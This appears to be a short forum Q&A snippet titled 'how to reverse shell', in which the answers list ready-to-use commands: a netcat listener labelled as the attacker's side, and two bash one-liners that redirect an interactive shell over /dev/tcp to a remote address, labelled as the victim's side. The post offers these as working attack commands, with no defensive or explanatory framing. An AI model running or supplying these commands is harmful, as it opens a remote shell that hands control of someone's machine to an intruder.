Q:

how to reverse shell

nc -l -p 9000 -vvv # Attacker
1
/bin/bash -i > /dev/tcp/0.0.0.0/9000 0<&1 2>&1 # Victim
1
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0

New to Communities?

Join the community